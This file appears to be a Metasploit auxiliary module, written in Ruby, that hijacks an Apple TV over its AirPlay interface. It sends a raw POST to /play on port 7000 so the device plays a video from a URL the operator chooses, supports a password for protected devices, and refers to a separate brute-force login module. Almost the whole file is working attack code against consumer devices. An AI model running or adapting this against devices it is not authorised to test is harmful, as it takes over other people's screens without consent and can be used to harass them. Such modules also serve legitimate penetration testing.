1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'uri'
7

8
class MetasploitModule < Msf::Auxiliary
9
  include Msf::Exploit::Remote::HttpClient
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'Apple TV Video Remote Control',
16
        'Description' => %q{
17
          This module plays a video on an AppleTV device. Note that
18
          AppleTV can be somewhat picky about the server that hosts the video.
19
          Tested servers include default IIS, default Apache, and Ruby's WEBrick.
20
          For WEBrick, the default MIME list may need to be updated, depending on
21
          what media file is to be played. Python SimpleHTTPServer is not
22
          recommended. Also, if you're playing a video, the URL must be an IP
23
          address. Some AppleTV devices are actually password-protected; in that
24
          case please set the PASSWORD datastore option. For password
25
          brute forcing, please see the module auxiliary/scanner/http/appletv_login.
26
        },
27
        'Author' => [
28
          '0a29406d9794e4f9b30b3c5d6702c708', # Original work
29
          'sinn3r' # Make myself liable to mistakes since I made significant changes
30
        ],
31
        'References' => [
32
          ['URL', 'http://nto.github.io/AirPlay.html']
33
        ],
34
        'DefaultOptions' => { 'HttpUsername' => 'AirPlay' },
35
        'License' => MSF_LICENSE,
36
        'Notes' => {
37
          'Stability' => [CRASH_SAFE],
38
          'SideEffects' => [IOC_IN_LOGS, SCREEN_EFFECTS],
39
          'Reliability' => []
40
        }
41
      )
42
    )
43

44
    register_options([
45
      Opt::RPORT(7000),
46
      OptInt.new('TIME', [true, 'Time in seconds to show the video', 60]),
47
      OptString.new('URL', [true, 'URL of video to show. Must use an IP address']),
48
      OptString.new('HttpPassword', [false, 'The password for AppleTV AirPlay'])
49
    ])
50

51
    # We're not actually using any of these against AppleTV in our Rex HTTP client init,
52
    # so deregister them so we don't overwhelm the user with fake options.
53
    deregister_options(
54
      'HTTP::uri_encode_mode', 'HTTP::uri_full_url', 'HTTP::pad_method_uri_count',
55
      'HTTP::pad_uri_version_count', 'HTTP::pad_method_uri_type', 'HTTP::pad_uri_version_type',
56
      'HTTP::method_random_valid', 'HTTP::method_random_invalid', 'HTTP::method_random_case',
57
      'HTTP::uri_dir_self_reference', 'HTTP::uri_dir_fake_relative', 'HTTP::uri_use_backslashes',
58
      'HTTP::pad_fake_headers', 'HTTP::pad_fake_headers_count', 'HTTP::pad_get_params',
59
      'HTTP::pad_get_params_count', 'HTTP::pad_post_params', 'HTTP::pad_post_params_count',
60
      'HTTP::uri_fake_end', 'HTTP::uri_fake_params_start', 'HTTP::header_folding',
61
      'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2', 'NTLM::SendLM', 'NTLM::SendNTLM',
62
      'NTLM::SendSPN', 'NTLM::UseLMKey', 'DOMAIN', 'DigestAuthIIS', 'VHOST'
63
    )
64
  end
65

66
  #
67
  # Sends a video request to AppleTV. HttpClient isn't used because we actually need to keep
68
  # the connection alive so that the video can keep playing.
69
  #
70
  def send_video_request(opts)
71
    http = Rex::Proto::Http::Client.new(
72
      rhost,
73
      rport.to_i,
74
      {
75
        'Msf' => framework,
76
        'MsfExploit' => self
77
      },
78
      ssl,
79
      ssl_version,
80
      proxies,
81
      datastore['HttpUsername'],
82
      datastore['HttpPassword']
83
    )
84
    add_socket(http)
85

86
    http.set_config('agent' => datastore['UserAgent'])
87

88
    req = http.request_raw(opts)
89
    res = http.send_recv(req)
90
    Rex.sleep(datastore['TIME']) if res.code == 200
91
    http.close
92

93
    res
94
  end
95

96
  #
97
  # Checks the URI datastore option. AppleTV is sort of picky about the URI. It's better to
98
  # always supply an IP instead of a domain.
99
  #
100
  def validate_source!(uri)
101
    unless Rex::Socket.is_ipv4?(URI(uri).host) # Same trick in target_uri form HttpClient
102
      raise Msf::OptionValidateError, ['URL']
103
    end
104
  end
105

106
  #
107
  # Plays a video as a new thread
108
  #
109
  def play_video_uri
110
    uri = datastore['URL']
111
    validate_source!(uri)
112

113
    body = "Content-Location: #{uri}\n"
114
    body << "Start-Position: 0.0\n"
115

116
    opts = {
117
      'method' => 'POST',
118
      'uri' => '/play',
119
      'headers' => {
120
        'Content-Length' => body.length.to_s,
121
        'Content-Type' => 'text/parameters'
122
      },
123
      'data' => body
124
    }
125

126
    res = send_video_request(opts)
127

128
    if !res
129
      print_status('The connection timed out')
130
    elsif res.code == 200
131
      print_status('Received HTTP 200')
132
    else
133
      print_error('The request failed due to an unknown reason')
134
    end
135
  end
136

137
  #
138
  # Maybe it's just me not understanding the /stop API correctly, but when I send a request to
139
  # /stop, it doesn't actually do anything. It is sort of possible to stop my video by looking
140
  # through framework.threads.each {|t| puts t[:tm_name]}, and then kill the right thread. But
141
  # if there are multiple appletv_display_video running, we don't seem to have a good way to
142
  # kill the right thread we want. We could kill them all, but we shouldn't do that. So I'll
143
  # just leave this method here, and then we'll think about how to do it later.
144
  #
145
  def stop_play
146
    raise NotImplementedError
147
  end
148

149
  def run
150
    print_status("Video request sent. Duration set: #{datastore['TIME']} seconds")
151
    play_video_uri
152
  end
153
end
154

155